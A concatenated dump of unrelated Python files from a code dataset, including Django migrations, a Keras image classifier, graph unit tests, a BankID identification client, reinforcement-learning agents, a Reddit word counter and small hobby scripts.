assert (df_x.reg == df_x.idx%reg_offset).all()
assert (df_x.id == df_x.idx//reg_offset).all()
df = df.assign(idx = df.reg + reg_offset * df.id)
assert (df.reg == df.idx%reg_offset).all()
assert (df.id == df.idx//reg_offset).all()
df = df.sort_values(by = 'idx').reset_index(drop = True)
df_x = df_x.sort_values(by = 'idx').reset_index(drop = True)
idx_x = np.array(df_x.idx)
idx_t = np.array(df.idx)
i_hit = np.searchsorted(idx_x, idx_t, side = 'right')
i_hit = i_hit - 1
m_exists = (i_hit >= 0) & (i_hit < df_x.shape[0])
i_hit[~m_exists] = -1
x_id = np.empty_like(np.array(df.id))
x_id[:] = -2
x_id[~m_exists] = -1
x_id[m_exists] = df_x.loc[i_hit[m_exists]].id
assert (x_id != -2).all()
id_match = (df.id >=0) & (df.id == x_id)
i_hit[~id_match] = -1
df = df.assign(hit = i_hit)
df_x = df_x.assign(index = df_x.index)
df = df.merge(df_x[['d', 'index', 'reg', 'id']], how = 'left', left_on = df.hit, right_on = 'index')
del df_x
df = df.drop(['index', 'hit'], axis = 1)
d = df.d.fillna(0).astype(np.int32)
df = df.drop('d', axis = 1)
reg_diag = df.reg_y.fillna(0).astype(np.int32)
df = df.drop('reg_y', axis = 1)
diagnose_age = df.reg_x - reg_diag
m = diagnose_age >= 0
d[~m] = 0
m = diagnose_age < MAX_DIAGNOSIS_AGE
d[~m] = 0
df = df.assign(d = d)
df = df.drop(['idx'], axis = 1)
df = df.assign(id_y = df.id_y.fillna(0).astype(np.int32))
assert (df[df.d !=0].id_x == df[df.d !=0].id_y).all()
df = df.drop(['id_y'], axis = 1)
npuint64_info = np.iinfo(np.uint64)
npuint64_info.max
|
20,772 | 6fbc018f6cf22c079ad7c39ae973b5eb6267878e | from sympy import divisors
# --- Incomplete ---
SMALLEST = 12 # 12 is the lowest abundant number
LIMIT = 28123 # All numbers above this can be the sum of two abundant numbers
def proper_divisors(number):
"""
Takes a number and returns a list of it's proper factors.
:param number:int
:return: factors:list
"""
factors = (divisors(number))
factors.remove(number)
return factors
def perfect_number(number):
"""
Checks if a number is perfect by summing it's proper divisors and compares with the number, less is deficient
greater is abundant.
:param number:int
:return perfect|deficient|abundant:str
"""
sum_divisors = sum(proper_divisors(number))
if number == sum_divisors:
return 'perfect'
else:
if number < sum_divisors:
return 'abundant'
else:
return 'deficient'
def is_abundant(check_number):
"""
Checks if a number is perfect by summing it's proper divisors and compares with the number, less is deficient
greater is abundant.
:param check_number:int
:return perfect|deficient|abundant:str
"""
if number < sum(proper_divisors(check_number)):
return True
else:
return False
# Get a list of abundant numbers
abundant_numbers = list()
for number in range(SMALLEST, LIMIT):
if abundant := perfect_number(number) == 'abundant':
# print(f'{number} is an abundant number with proper divisors {proper_divisors(number)}.')
abundant_numbers.append(number)
print(abundant_numbers)
"""
What do we want?
Sum of positive integers that cannot be expressed as the sum of two abundant numbers
12 is the smallest abundant number, therefore 11! must be part of the total sum
all integers > 28123 can be written as the sum of two abundant, giving a limit.
What have we got?
A list of all abundant numbers.
"""
answer = list()
for abundant in abundant_numbers:
for next_index in range(12, 28133):
if abundant + next_index < LIMIT:
answer.append(abundant)
else:
break
print(sum(answer))
print(f'Sum is {sum(answer)}')
|
20,773 | fcd478e4b91ca49559f3f03fa5addb6829d7261b | # Generated by Django 2.0.1 on 2018-01-18 19:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('stats', '0004_auto_20180116_2114'),
]
operations = [
migrations.RemoveField(
model_name='stat',
name='created_date',
),
migrations.RemoveField(
model_name='stat',
name='published_date',
),
migrations.AlterField(
model_name='stat',
name='author',
field=models.CharField(blank=True, default='anonymous', max_length=200),
),
migrations.AlterField(
model_name='stat',
name='name',
field=models.CharField(blank=True, max_length=200),
),
migrations.AlterField(
model_name='stat',
name='tag',
field=models.CharField(blank=True, max_length=1000),
),
migrations.AlterField(
model_name='stat',
name='upload',
field=models.FileField(upload_to='media/'),
),
]
|
20,774 | bba27853aac7d5a41481e4822ae42958be74619f | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('ideascale', '0007_auto_20150429_1503'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='comments',
field=models.PositiveIntegerField(null=True),
),
migrations.AlterField(
model_name='comment',
name='negative_votes',
field=models.PositiveIntegerField(null=True),
),
migrations.AlterField(
model_name='comment',
name='positive_votes',
field=models.PositiveIntegerField(),
),
migrations.AlterField(
model_name='idea',
name='comments',
field=models.PositiveIntegerField(null=True),
),
migrations.AlterField(
model_name='idea',
name='negative_votes',
field=models.PositiveIntegerField(null=True),
),
migrations.AlterField(
model_name='idea',
name='positive_votes',
field=models.PositiveIntegerField(null=True),
),
]
|
20,775 | f43cc844a8f74ff1b15dfa1fa60d087dbf9e926a | import numpy as np
import os
import time
from keras.applications.inception_v3 import InceptionV3
from keras.preprocessing import image
from keras.layers import GlobalAveragePooling2D, Dense, Dropout,Activation,Flatten
from keras.applications.resnet50 import preprocess_input,decode_predictions
from keras.models import load_model
#from imagenet_utils import preprocess_input
from keras.layers import Input
from keras.models import Model
from keras.utils import np_utils
from sklearn.utils import shuffle
from sklearn.cross_validation import train_test_split
import pandas as pd
import random
PATH = os.getcwd()
# Define data path
data_path = PATH + '/data'
data_dir_list = os.listdir(data_path)
img_data_list=[]
for dataset in data_dir_list:
img_list=os.listdir(data_path+'/'+ dataset)
random.shuffle(img_list)
img_list=img_list[0:3000]
print ('Loaded the images of dataset-'+'{}\n'.format(dataset))
for img in img_list:
img_path = data_path + '/'+ dataset + '/'+ img
img = image.load_img(img_path, target_size=(299, 299))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
#print('Input image shape:', x.shape)
img_data_list.append(x)
img_data = np.array(img_data_list)
#img_data = img_data.astype('float32')
print (img_data.shape)
img_data=np.rollaxis(img_data,1,0)
print (img_data.shape)
img_data=img_data[0]
print (img_data.shape)
# Define the number of classes
num_classes = 5
num_of_samples = img_data.shape[0]
labels = np.ones((num_of_samples,),dtype='int64')
'''
labels[0:202]=0
labels[202:404]=1
labels[404:606]=2
labels[606:]=3
'''
data=pd.read_csv('trainLabels.csv')
data= np.array(data)
r,c =data.shape
mp={}
for i in range(0,r):
mp[str(str(data[i][0])+'.jpeg')] = data[i][1]
i=0
src_path='./data/train001_CLAHE_299by299/'
dirs=os.listdir(src_path)
for img in img_list:
if not(os.path.isfile(src_path+img)) or (not(img.endswith('.jpeg'))):
continue
labels[i]=(mp.get(img))
i=i+1
names = ['NoDR','EarlyDR','ModerateDR','SevereDR','NPDR']
# convert class labels to on-hot encoding
Y = np_utils.to_categorical(labels, num_classes)
#Shuffle the dataset
x,y = shuffle(img_data,Y, random_state=2)
# Split the dataset
X_train, X_test, y_train, y_test = train_test_split(x, y, test_size=0.2)
#using pre trained weights and fine tuning
image_input = Input(shape=(299, 299, 3))
model = InceptionV3(input_tensor=image_input, include_top=True,weights='imagenet')
model.summary()
last_layer = model.output
#x= Flatten(name='flatten')(last_layer)
#x = GlobalAveragePooling2D()(last_layer)
# add fully-connected & dropout layers
#x = Flatten()(x)
x = Dense(512, activation='relu',name='fc-1')(last_layer)
x = Dropout(0.5)(x)
x = Dense(256, activation='relu',name='fc-2')(x)
x = Dropout(0.5)(x)
# a softmax layer for 5 classes
out = Dense(num_classes, activation='softmax',name='output_layer')(x)
#out = Dense(5, activation='softmax', name='output_layer')(last_layer)
custom_resnet_model = Model(inputs=image_input,outputs= out)
custom_resnet_model.summary()
for layer in custom_resnet_model.layers[:-6]:
layer.trainable = False
custom_resnet_model.layers[-1].trainable
custom_resnet_model.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])
t=time.time()
hist = custom_resnet_model.fit(X_train, y_train, batch_size=32, epochs=20, verbose=1, validation_data=(X_test, y_test))
#custom_resnet_model.save('ResNet50_only_classifier_trained.h5')
print('Training time: %s' % (t - time.time()))
(loss, accuracy) = custom_resnet_model.evaluate(X_test, y_test, batch_size=10, verbose=1)
print("[INFO] loss={:.4f}, accuracy: {:.4f}%".format(loss,accuracy * 100))
|
20,776 | eca4a228f7690144035fb777d113017181cd60b0 | import unittest
import lesson18_graf as l
class GraphTest(unittest.TestCase):
def test_add_vertex(self):
g = l.SimpleGraph(4)
vertexes = [i for i in range(4)]
for v in vertexes:
g.AddVertex(v)
self.assertEqual(len(g.m_adjacency), 4)
self.assertEqual(len(g.m_adjacency[0]), 4)
new_vertex = l.Vertex(4)
g.AddVertex(new_vertex)
self.assertEqual(len(g.m_adjacency), 5)
self.assertEqual(len(g.m_adjacency[0]), 5)
self.assertEqual(g.m_adjacency[0], [0, 0, 0, 0, 0])
def test_add_edge(self):
g = l.SimpleGraph(5)
vertexes = [i for i in range(5)]
for i in vertexes:
g.AddVertex(i)
g.AddEdge(0, 1)
self.assertListEqual(g.m_adjacency[0], [0, 1, 0, 0, 0])
self.assertListEqual(g.m_adjacency[1], [1, 0, 0, 0, 0])
g.AddEdge(4, 1)
self.assertListEqual(g.m_adjacency[1], [1, 0, 0, 0, 1])
self.assertListEqual(g.m_adjacency[4], [0, 1, 0, 0, 0])
def test_remove_vertex(self):
g = l.SimpleGraph(5)
vertexes = [i for i in range(5)]
for v in vertexes:
g.AddVertex(v)
g.AddEdge(vertexes[0], vertexes[1])
g.AddEdge(vertexes[4], vertexes[1])
g.RemoveVertex(1)
self.assertListEqual(g.m_adjacency[0], [0, 0, 0, 0])
self.assertListEqual(g.m_adjacency[1], [0, 0, 0, 0])
self.assertListEqual(g.m_adjacency[2], [0, 0, 0, 0])
self.assertListEqual(g.m_adjacency[3], [0, 0, 0, 0])
def test_remove_edge(self):
g = l.SimpleGraph(5)
vertexes = [l.Vertex(i) for i in range(5)]
for i in vertexes:
g.AddVertex(i)
g.m_adjacency = [
[0, 1, 1, 1, 0],
[1, 0, 0, 1, 1],
[1, 0, 0, 1, 0],
[1, 1, 1, 1, 1],
[0, 1, 0, 1, 0],
]
g.RemoveEdge(0, 1)
self.assertListEqual(g.m_adjacency[0], [0, 0, 1, 1, 0])
self.assertListEqual(g.m_adjacency[1], [0, 0, 0, 1, 1])
def test_is_edge(self):
g = l.SimpleGraph(5)
vertexes = [i for i in range(5)]
for i in vertexes:
g.AddVertex(i)
g.m_adjacency = [
[0, 1, 1, 1, 0],
[1, 0, 0, 1, 1],
[1, 0, 0, 1, 0],
[1, 1, 1, 1, 1],
[0, 1, 0, 1, 0],
]
self.assertTrue(g.IsEdge(0, 1))
self.assertFalse(g.IsEdge(0, 4))
self.assertTrue(g.IsEdge(3, 2))
self.assertFalse(g.IsEdge(2, 1))
new_vert = 10
self.assertFalse(g.IsEdge(2, new_vert))
def test_dfs(self):
g = l.SimpleGraph(5)
g.AddVertex('A')
g.AddVertex('B')
g.AddVertex('C')
g.AddVertex('D')
g.AddVertex('E')
g.m_adjacency = [
[0, 1, 1, 1, 0], # A
[1, 0, 0, 1, 1], # B
[1, 0, 0, 1, 0], # C
[1, 1, 1, 1, 1], # D
[0, 1, 0, 1, 0], # E
]
self.assertEqual([i.Value for i in g.DepthFirstSearch(0, 1)], ['A', 'B'])
self.assertEqual([i.Value for i in g.DepthFirstSearch(3, 3)], ['D', 'D'])
self.assertEqual([i.Value for i in g.DepthFirstSearch(2, 4)], ['C', 'A', 'B', 'E'])
# self.assertEqual(g.DepthFirstSearch(2, 4), [])
def test_bfs(self):
g = l.SimpleGraph(5)
g.AddVertex('A')
g.AddVertex('B')
g.AddVertex('C')
g.AddVertex('D')
g.AddVertex('E')
g.m_adjacency = [
[0, 1, 1, 1, 0], # A
[1, 0, 0, 1, 1], # B
[1, 0, 0, 1, 0], # C
[1, 1, 1, 1, 1], # D
[0, 1, 0, 1, 0], # E
]
g.AddVertex('G')
g.AddEdge(4, 5)
self.assertEqual([i.Value for i in g.BreadthFirstSearch(3, 5)], ['D', 'E', 'G'])
self.assertEqual([i.Value for i in g.BreadthFirstSearch(2, 4)], ['C', 'D', 'E'])
self.assertEqual([i.Value for i in g.BreadthFirstSearch(4, 2)], ['E', 'D', 'C'])
self.assertEqual([i.Value for i in g.BreadthFirstSearch(3, 3)], ['D'])
self.assertEqual([i.Value for i in g.BreadthFirstSearch(1, 2)], ['B', 'A', 'C'])
def test_WeakVertices(self):
g = l.SimpleGraph(5)
g.AddVertex('A')
g.AddVertex('B')
g.AddVertex('C')
g.AddVertex('D')
g.AddVertex('E')
g.AddVertex('G')
g.AddVertex('Z')
g.AddVertex('R')
g.AddVertex('K')
g.m_adjacency = [
# A B C D E G Z R K
[0, 1, 1, 1, 0, 0, 0, 0, 0], # A
[1, 0, 1, 0, 1, 0, 0, 0, 0], # B
[1, 1, 0, 1, 0, 1, 0, 0, 0], # C
[1, 0, 1, 0, 0, 0, 0, 0, 0], # D
[0, 1, 0, 0, 0, 1, 0, 0, 0], # E
[0, 0, 1, 0, 1, 0, 1, 1, 0], # G
[0, 0, 0, 0, 0, 1, 0, 1, 0], # Z
[0, 1, 0, 1, 0, 1, 1, 0, 1], # R
[0, 0, 0, 0, 0, 0, 0, 1, 0], # K
]
print([i.Value for i in g.WeakVertices()])
if __name__ == '__main__':
unittest.main()
|
20,777 | 4773a164e5920438c24227467d82841d37440c5b | #!/usr/bin/python3
#
# Script Name: tracking_btc.py
# Location : /home/louis/Development/python/mymoney
# Description: This script scrapes
#
# Developer: Louis Lao
# Date:
#
# Modified By:
# Date:
# Reason:
import auth_mongodb
import moneyMod1
import datetime
import threading
# The following imports are required to trap Ctr-C to stop the script
# without printing a bunch of error messages.
import signal
import sys
import os
def signal_handler (signal, frame) :
print('\tExiting script because you pressed Ctrl+C!')
sys.exit(0)
# Register the Ctr-C siganl handler.
signal.signal (signal.SIGINT, signal_handler)
dev_null = open (os.devnull, 'w')
sys.stderr = dev_null
print('Press Ctrl+C to stop script!')
# Get Bitcoin data from Google web site.
url = "https://finance.google.com/finance?q=currency:btc"
def scrape_btc () :
timer = threading.Timer (90.0, scrape_btc)
timer.start()
indexes_scraper = moneyMod1.Scraper (url, False)
btcData = indexes_scraper.get_bitcoin ()
data = btcData.split ("::")
print ("Taken at:", datetime.datetime.now().time())
print ("Bitcoin date:", data[3], data[5], data[6])
print ("Bitcoin:", data[0], "(" + data[1] + "/" + data[2] + ")")
print ("Bitcoin BASE:", str(round((float(data[0]) - float(data[1])), 4)))
print('Press Ctrl+C to stop script!')
if __name__ == "__main__" :
scrape_btc()
|
20,778 | 08529bcac2e1f2d909fa43cfad76a1250a315381 | from distutils.core import setup, Extension
omxplayermodule = Extension('omxplayer',
define_macros = [('TARGET_RASPBERRY_PI', '1'),
('__VIDEOCORE4__','1'),
('GRAPHICS_X_VG','1'),
('HAVE_OMXLIB','1'),
('USE_EXTERNAL_FFMPEG','1'),
('USE_EXTERNAL_OMX','1'),
('HAVE_LIBAVCODEC_AVCODEC_H','1'),
('HAVE_LIBAVUTIL_MEM_H','1'),
('HAVE_LIBAVUTIL_OPT_H','1'),
('HAVE_LIBAVUTIL_AVUTIL_H','1'),
('HAVE_LIBAVFORMAT_AVFORMAT_H','1'),
('HAVE_LIBAVFILTER_AVFILTER_H','1'),
('OMX','1'),
('OMX_SKIP64BIT','1'),
('USE_EXTERNAL_LIBBCM_HOST','1'),
('__STDC_CONSTANT_MACROS','1'),
('STANDALONE','1'),
('__STDC_LIMIT_MACROS','1'),
('_LINUX','1'),
('_REENTRANT','1'),
('_LARGEFILE64_SOURCE','1'),
],
sources = ['omxplayermodule.cpp'],
include_dirs = ['/home/pi/omxplayer/ffmpeg_compiled/usr/local/include',
'/home/pi/omxplayer',
'/usr/local/include'],
library_dirs = ['/home/pi/omxplayer/ffmpeg_compiled/usr/local/lib',
'/usr/local/lib',
'/opt/vc/lib'],
extra_objects = ['/home/pi/omxplayer/linux/RBP.o',
'/home/pi/omxplayer/DynamicDll.o',
'/opt/vc/lib/libbcm_host.so',
'/home/pi/omxplayer/utils/log.o',
'/home/pi/omxplayer/OMXCore.o',
'/home/pi/omxplayer/File.o',
'/home/pi/omxplayer/OMXStreamInfo.o',
'/home/pi/omxplayer/OMXPlayerAudio.o',
'/home/pi/omxplayer/OMXThread.o',
'/home/pi/omxplayer/OMXAudio.o',
'/home/pi/omxplayer/OMXAudioCodecOMX.o',
'/opt/vc/lib/libopenmaxil.so',
'/home/pi/omxplayer/OMXClock.o',
'/home/pi/omxplayer/OMXReader.o',
'/home/pi/omxplayer/utils/PCMRemap.o',
'/home/pi/omxplayer/linux/XMemUtils.o',
'/home/pi/omxplayer/ffmpeg_compiled/usr/local/lib/libavcodec.so',
'/home/pi/omxplayer/ffmpeg_compiled/usr/local/lib/libavformat.so',
'/home/pi/omxplayer/ffmpeg_compiled/usr/local/lib/libavutil.so',
'/home/pi/omxplayer/ffmpeg_compiled/usr/local/lib/libavdevice.so',
'/home/pi/omxplayer/ffmpeg_compiled/usr/local/lib/libpostproc.so',
'/home/pi/omxplayer/ffmpeg_compiled/usr/local/lib/libswresample.so',
'/home/pi/omxplayer/ffmpeg_compiled/usr/local/lib/libswscale.so'])
setup(name = 'omxplayer', version = '0.1', description = 'OMXPlayer', ext_modules = [omxplayermodule]) |
20,779 | 864bd0ffe1aef00d23834bfc0ab38daf7678a800 | def text():
print("")
print("")
#print("From part 61")
print("")
print("Before the pharaoh has a chance to speak, you blurt out your story and present him with the potion.")
print("")
print('"Thank you," says the pharaoh. "I do not know who you are, but I am in your debt. Now I have the power I need to defeat the evil Priests of Amun-Ra. How can I repay you?"')
print("")
print('You tell him that you only want to get back to your own time. He sends you to his magicians, and they help you. You only ask for one more thing before you return. You ask the pharaoh for some general information about his country. After all, you still have to hand in a term paper when you get back.')
print("")
print('The pharaoh smiles and gives you a personal tour of his city. Then he gives you a special present before you return home.')
print("")
print("You get a good grade on your term paper, but your parents will always wonder where you got the small gold statue of an eagle.")
print("")
print("")
print("+ The End")
print("")
print("")
return |
20,780 | 49c151713c93d9d0858ef0be6c32ec1ed089ba69 | from .visualize import annotation
from .visualize import draw
from .visualize import embedding
|
20,781 | 9cd870237236d7cb6a8698022df32623f1b5bf46 | import math
import time
def split(str):
m=len(str)
i=0
t=[]
while(i<m):
tem=int(str[i]+str[i+1])
t.append(tem)
i=i+2
return t
def bigmul(p,q):
i=0
j=0
sum=0
m=len(p)
n=len(q)
for i in range (m):
for j in range(n):
sum+=(10**(m-2*i+n-2*j))*p[i]*q[j]
print(sum)
return sum
#string1="3456"
#string2="4545"
string1='3141592653589793238462643383279502884197169399375105820974944592'
string2='2718281828459045235360287471352662497757247093699959574966967627'
t0=time.time()
array1=split(string1)
array2=split(string2)
product=bigmul(array1,array2)
t1=time.time()
print'time consumes is',t1-t0
#print " ".join('%02d'%x for x in array1)
#print " ".join('%02d'%x for x in array2)
print 'the prduct is ',product
|
20,782 | a5308124cf5d5ed0b744ec1dee93b857b01fdd7b | import random
rock = '''
_______
---' ____)
(_____)
(_____)
(____)
---.__(___)
'''
paper = '''
_______
---' ____)____
______)
_______)
_______)
---.__________)
'''
scissors = '''
_______
---' ____)____
______)
__________)
(____)
---.__(___)
'''
obj=[rock,paper,scissors]
print("welcome to rock, paper, scissors!")
choices=int(input("enter any choice 0,1,2:"))
print("you've choosen:")
you=obj[choices]
print(you)
style=random.randint(0,2)
print("computer's choice:")
computer=obj[style]
print(computer)
if you==computer:
print("its a tie!")
elif you>computer:
print("you win!")
else:
print("you lose!")
|
20,783 | c9e3e6abc1234636c83ccbf95e99ffd7b9970a3d | import config
import webbrowser
import requests
import time
import json
def get_token():
""" This function will send a request with HTTP Basic authentication to receive a token
Returns:
String -- Token
"""
# Token url
token_endpoint = "https://api.signicat.io/oauth/connect/token"
# Setting the grant type to client_credentials
data = {'grant_type':'client_credentials', 'scope':'identify'}
# Posting to token url with HTTP basic authentication
token = requests.post(token_endpoint, data=data,allow_redirects=True, auth=(config.CLIENT_ID, config.CLIENT_SECRET))
# Converting json string to json
token_json = json.loads(token.text)
# Returning the access_token
return token_json['access_token']
def get_id():
""" This function fetches the id of a session and directs the user to BankID authentication
Returns:
[String]: Session ID
"""
token = get_token()
# Endpoint url
endpoint = "https://api.idfy.io/identification/v2/sessions"
# Setting headers with the authorization bearer
headers = {'Content-Type': 'application/json', 'Authorization': f'Bearer {token}'}
data = {
"languages": "en",
"flow": "redirect",
"allowedProviders": [
"no_bankid_netcentric",
"no_bankid_mobile"
],
"include": [
"name",
"date_of_birth",
"phone_number",
"nin",
"email"
],
"redirectSettings": {
"successUrl": "https://example.com/success",
"abortUrl": "https://example.com/abort",
"errorUrl": "https://example.com/error"
}
}
# Converting the data into a json string and sending a post request
response = requests.post(endpoint, data=json.dumps(data), headers=headers).json()
# Opening the browser and to authenticate the user
webbrowser.open(response['url'])
# returning the session id
return response['id']
def get_session(_id):
""" This function retrieves the identification session by using the id we found by logging in with BankID
"""
token = get_token()
headers = {'Content-Type': 'application/json', 'Authorization': f'Bearer {token}'}
endpoint = f"https://api.signicat.io/identification/v2/sessions/{_id}"
response = requests.get(endpoint, headers=headers).json()
identification = response['identity']
print(identification)
return response['identity'] |
20,784 | f68b817206aa80d8e033a2e35e5565cbcc2df6ff | """
-- Sent Collection v.1 para análise de agrupamento --
-- Grupo 1 --
--Marciele de Menezes Bittencourt --
--Rodrigo Vieira da Silva --
--Washington Rodrigo Dias da Silva --
-----------------------------------------------------
"""
import json
import os
def save(filename, data):
mkdir(filename)
with open(filename, 'w') as outfile:
json.dump(data, outfile)
def savecsv(filename, header, data):
mkdir(filename)
with open(filename, 'w', encoding='utf-8') as file:
for cell in header:
file.write('"{}"'.format(cell))
file.write(';')
file.write('\n')
for row in data:
for cell in row:
file.write(str(cell))
file.write(';')
file.write('\n')
def saveclu(filename, Y):
mkdir(filename)
with open(filename, 'w', encoding='utf-8') as file:
for i, y in enumerate(Y):
file.write(str(i))
file.write('\t')
file.write(str(y))
file.write('\n')
def mkdir(filename):
directory = os.path.dirname(filename)
if not os.path.exists(directory):
os.makedirs(directory)
def intTryParse(value):
try:
return int(value), True
except ValueError:
return value, False
def inputInt(msg, maxV=None):
i = input(msg)
i, success = intTryParse(i)
success = success and ((maxV is None) or (i <= maxV and i >=0))
while(not success):
print("Invalid Value!")
i = input(msg)
i, success = intTryParse(i)
success = success and ((maxV is None) or (i <= maxV and i >=0))
return i
def printGreen(prt): print("\033[92m {}\033[00m" .format(prt))
def printRed(prt): print("\033[92m {}\033[00m" .format(prt)) |
20,785 | d515314d746d4b746e0eed823c0c95e29aaf92fd | import random
import numpy as np
from hyperparams import *
class Agent():
def __init__(self, env):
self.env = env
self.reset()
def reset(self):
self.Q = np.zeros((self.env.w, self.env.h, 4))
def get_action(self, s):
if random.random() < ε:
return random.randint(0, 3)
else:
return np.argmax(self.Q[tuple(s)])
class QLearning(Agent):
def __init__(self, env):
Agent.__init__(self, env)
def update_Q(self, s, a, r, s2, a2):
s_a = tuple(s) + tuple([a])
self.Q[s_a] += α * (r + (γ * np.max(self.Q[tuple(s2)])) - self.Q[s_a])
class reg_SARSA(Agent):
def __init__(self, env):
Agent.__init__(self, env)
def update_Q(self, s, a, r, s2, a2):
s_a = tuple(s) + tuple([a])
s2_a2 = tuple(s2) + tuple([a2])
self.Q[s_a] += α * (r + (γ * self.Q[s2_a2]) - self.Q[s_a])
class Expected_SARSA(Agent):
def __init__(self, env):
Agent.__init__(self, env)
def expected_next_Q(self, s2):
E = 0
for a2 in range(4):
s2_a2 = tuple(s2) + tuple([a2])
if a2 == np.argmax(self.Q[tuple(s2)]):
prob = 1 - ε + (ε / 4)
else:
prob = ε / 4
E += prob * self.Q[s2_a2]
return E
def update_Q(self, s, a, r, s2, a2):
s_a = tuple(s) + tuple([a])
s2_a2 = tuple(s2) + tuple([a2])
self.Q[s_a] += α * (r + (γ * self.expected_next_Q(s2)) - self.Q[s_a])
|
20,786 | 3ea9309c8929abd0ec3ac2f72e4d50e97efd6647 | #!/usr/bin/python3
"""BEHOLD MY ABOMINATION"""
import requests
def count_words(subreddit, word_list, *args):
"""no loops T_T"""
# print(args)
base_url = "https://www.reddit.com"
data = {"grant_type": "password",
"username": "jcook0017",
"password": "temppassword"}
auth = requests.auth.HTTPBasicAuth("LMsd7o4qaDp3cw",
"KQLYhsl5_Oe1RzvKF-77sqpEYHgGvg")
try:
r = args[0]
except IndexError:
# print("post")
r = requests.post(base_url + "/api/v1/access_token",
data=data,
headers={"user-agent": "0x13 Count it by jcook0017"},
auth=auth)
d = r.json()
# print(d)
token = "bearer" + d["access_token"]
base_url = "https://oauth.reddit.com"
headers = {"Authorization": token,
"User-Agent": "0x13 Count it by jcook0017"}
try:
result = args[1]
except IndexError:
# print("get")
result = requests.get(base_url + "/r/{}/hot.json".format(subreddit),
headers=headers)
# init vars if not
try:
count_word_list = args[3]
except IndexError:
count_word_list = 0
try:
count_title = args[4]
except IndexError:
count_title = 0
try:
my_dict = args[2]
except IndexError:
my_dict = {}
# print("my_dict = ", my_dict)
# print(count_word_list)
# print(count_title)
# print(word_list[count_word_list])
if ((count_title < 25 and not isinstance(my_dict, list) and
result.status_code == 200)):
my_stirng = (result
.json()["data"]["children"][count_title]["data"]["title"]
.lower())
# print("my_stirng = ", my_stirng)
my_stirng = my_stirng.lower()
# print(result.status_code)
if result.status_code == 200 and count_word_list < len(word_list):
key = word_list[count_word_list].lower()
# print(type(key))
# print(key)
if my_stirng.find(str(key)) != -1:
# print(key)
try:
my_dict[key] += my_stirng.count(key)
except KeyError:
my_dict[key] = my_stirng.count(key)
count_title += 1
return count_words(subreddit,
word_list,
r,
result,
my_dict,
count_word_list,
count_title)
else:
count_word_list += 1
return count_words(subreddit,
word_list,
r,
result,
my_dict,
count_word_list,
count_title)
# print("full 'loop'")
count_word_list = 0
count_title += 1
return count_words(subreddit,
word_list,
r,
result,
my_dict,
count_word_list,
count_title)
elif count_title == 25 and result.status_code == 200:
# print(count_title)
count_title = 0
count_word_list = 0
# print("after")
after = result.json()["data"]["after"]
# print(after)
result = requests.get(base_url + "/r/{}/hot.json&after={}"
.format(subreddit, after),
headers=headers)
return count_words(subreddit,
word_list,
r,
result,
my_dict,
count_word_list,
count_title)
else:
if not isinstance(my_dict, list):
# print(my_dict)
my_dict = sorted(my_dict.items(),
key=lambda x: (x[1], x[0]),
reverse=True)
# print(my_dict)
try:
list_count = args[5]
except IndexError:
list_count = 0
if list_count < len(my_dict):
print(my_dict[list_count][0], ": ", my_dict[list_count][1])
list_count += 1
return count_words(subreddit,
word_list,
r,
result,
my_dict,
count_word_list,
count_title,
list_count)
|
20,787 | fe6ca0dbd52f16b64128ba1d7c9a04a3a4bf2006 | # start_date_report.py
import csv
import datetime
import requests
import operator # Added to sort the csv.reader output
FILE_URL="http://marga.com.ar/employees-with-date.csv"
def get_start_date():
"""Interactively get the start date to query for."""
print()
print('Getting the first start date to query for.')
print()
print('The date must be greater than Jan 1st, 2018')
year = int(input('Enter a value for the year: '))
month = int(input('Enter a value for the month: '))
day = int(input('Enter a value for the day: '))
print()
return datetime.datetime(year, month, day)
def get_file_lines(url):
"""Returns the lines contained in the file at the given URL"""
# Download the file over the internet
response = requests.get(url, stream=True)
# Decode all lines into strings
lines = []
for line in response.iter_lines():
lines.append(line.decode("UTF-8"))
return lines
data = get_file_lines(FILE_URL)
def get_same_or_newer(start_date):
"""Returns the employees that started on the given date, or the closest one."""
# data = get_file_lines(FILE_URL) ## Moved up & out of the function
# reader = csv.reader(data[1:])
reader1 = csv.reader(data[1:]) ## Changed the above to two lines to these two
reader = sorted(reader1, key=operator.itemgetter(3))
# We want all employees that started at the same date or the closest newer
# date. To calculate that, we go through all the data and find the
# employees that started on the smallest date that's equal or bigger than
# the given start date.
min_date = datetime.datetime.today()
min_date_employees = []
for row in reader:
row_date = datetime.datetime.strptime(row[3], '%Y-%m-%d')
# If this date is smaller than the one we're looking for,
# we skip this row
if row_date < start_date:
continue
# If this date is smaller than the current minimum,
# we pick it as the new minimum, resetting the list of
# employees at the minimal date.
if row_date < min_date:
min_date = row_date
min_date_employees = []
return min_date, min_date_employees
def list_newer(start_date):
while start_date < datetime.datetime.today():
start_date, employees = get_same_or_newer(start_date)
print("Started on {}: {}".format(start_date.strftime("%b %d, %Y"), employees))
# Now move the date to the next one
start_date = start_date + datetime.timedelta(days=1)
def main():
start_date = get_start_date()
list_newer(start_date)
if __name__ == "__main__":
main()
|
20,788 | 40b3abaf49955fa49e0f48cd65c69e951ec4f8ae | from piece import Piece
class Pawn(Piece):
def __init__(self, color):
Piece.__init__(self, color)
self.name = color + '_' + 'P'
self.count = 0
def getLegalMoves(self, board):
position = self.getPosition()
LegalMovesListNull = []
LegalMovesListDestroyable = []
DoubleAdvance = False
for row in board:
for tile in row:
if tile.getPosition() == position:
if self.getCount() == 0:
DoubleAdvance = True
if self.getColor() == 'B':
if position[0] + 1 < 8 and board[position[0] + 1][position[1]].getName() == ' ':
LegalMovesListNull.append(board[position[0] + 1][position[1]])
if DoubleAdvance and position[0] + 2 < 8 and board[position[0] + 2][position[1]].getName() == ' ':
LegalMovesListNull.append(board[position[0] + 2][position[1]])
if position[0] + 1 < 8 and position[1] + 1 < 8 and board[position[0] + 1][position[1] + 1].getName() != ' ' and board[position[0] + 1][position[1] + 1].getColor() != tile.getColor():
LegalMovesListDestroyable.append(board[position[0] + 1][position[1] + 1])
if position[0] + 1 < 8 and position[1] - 1 > -1 and board[position[0] + 1][position[1] - 1].getName() != ' ' and board[position[0] + 1][position[1] - 1].getColor() != tile.getColor():
LegalMovesListDestroyable.append(board[position[0] + 1][position[1] - 1])
else:
if position[0] - 1 > -1 and board[position[0] - 1][position[1]].getName() == ' ':
LegalMovesListNull.append(board[position[0] - 1][position[1]])
